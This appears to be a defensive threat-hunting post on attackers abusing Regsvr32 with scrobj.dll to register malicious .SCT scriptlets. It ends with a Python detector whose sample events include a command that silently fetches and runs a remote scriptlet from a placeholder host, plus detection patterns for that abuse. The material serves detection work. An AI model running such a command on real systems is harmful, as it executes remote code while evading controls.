To install malware and persist on a target while moving laterally across the network, adversaries employ diverse evasive techniques. One highly effective method is registering their malicious scripts in the registry, where they coexist with legitimate Windows tools and system DLLs.

What is an SCT file?

The Component Object Model (COM) serves as a software component within Windows, storing scripts for software installed on a user's machine. These scripts, which can be written in languages such as VBScript, JavaScript, or JScript, are saved in an unmanaged code format known as .SCT.

Check the code in .SCT files

Inspect the SCT code for malicious content and extract the pertinent details from the script. In this instance, the code attempts to launch the Windows calculator on the machine without the user's consent, which raises the concern that it may also be malware code.
What is Regsvr32.exe?

Regsvr32 is a command-line utility used to register and unregister scripts in the Windows Registry, and it is capable of network communication.
Its options include a silent install (/s) and calling the Windows DllRegisterServer (/i) to register new information, whether legitimate or malicious code. Adversaries use "Regsvr32" together with "scrobj.dll" to register their malicious script in the registry. The "scrobj.dll" library is crucial in this context because it is the Scripting Runtime library used to communicate with COM. It grants access to the file system, enabling operations such as reading and writing text files, and attackers may abuse it to manipulate file system components, including disk drives, folders, and files.

Hunting the evil in the Registry
Examining the registry path reveals how the script persists and is loaded at runtime. Search your EDR for similar behaviors and create additional Windows use cases. Happy hunting!
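As an added example (not code from the original post), the following Python triages process-creation events for the Regsvr32 and scrobj.dll pattern described above: regsvr32 run silently (/s) with an /i: argument that points at a remote URL or a local .sct scriptlet while scrobj.dll is the library being registered. The event fields, PIDs and the placeholder URL are all constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Indicators from the post, matched case-insensitively against the command line.
SILENT_FLAG = re.compile(r"(?:^|\s)/s(?=\s|$)", re.I)
INSTALL_ARG = re.compile(r'(?:^|\s)/i:("[^"]+"|\S+)', re.I)
SCROBJ_REF = re.compile(r'(?:^|[\s\\"])scrobj\.dll(?="|\s|$)', re.I)
REMOTE_TARGET = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample telemetry (not real events); PIDs and the URL are placeholders.
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 1002, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "command_line": r"regsvr32 /s /i:http://placeholder.invalid/calc.sct scrobj.dll"},
    {"pid": 1003, "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32 /i:C:\Users\Public\update.sct scrobj.dll"},
    {"pid": 1004, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe scrobj.dll"},
]

def analyse(event: dict) -> tuple[str, list[str]]:
    """Classify one process-creation event as ('none'|'medium'|'high', reasons)."""
    if PureWindowsPath(event["image"]).name.lower() != "regsvr32.exe":
        return "none", []
    cmd = event["command_line"]
    reasons = []
    loads_scrobj = bool(SCROBJ_REF.search(cmd))
    if loads_scrobj:
        reasons.append("scrobj.dll (Scripting Runtime COM server) passed to regsvr32")
    install = INSTALL_ARG.search(cmd)
    if install:
        target = install.group(1).strip('"')
        if REMOTE_TARGET.match(target):
            reasons.append(f"/i: target is a remote URL: {target}")
        elif target.lower().endswith(".sct"):
            reasons.append(f"/i: target is a local .sct scriptlet: {target}")
        else:
            install = None  # ordinary /i: argument, not a scriptlet indicator
    if not reasons:
        return "none", []
    if SILENT_FLAG.search(cmd):
        reasons.append("/s suppresses the registration dialogs the user would otherwise see")
    severity = "high" if loads_scrobj and install else "medium"  # both halves of the pattern
    return severity, reasons

def hunt(events: list[dict]) -> dict[int, tuple[str, list[str]]]:
    """Return {pid: (severity, reasons)} for every event that is not benign."""
    return {ev["pid"]: res for ev in events if (res := analyse(ev))[0] != "none"}
```

Feed `hunt()` the process-creation events exported from your EDR (image path plus command line) to surface candidates for the registry review described above.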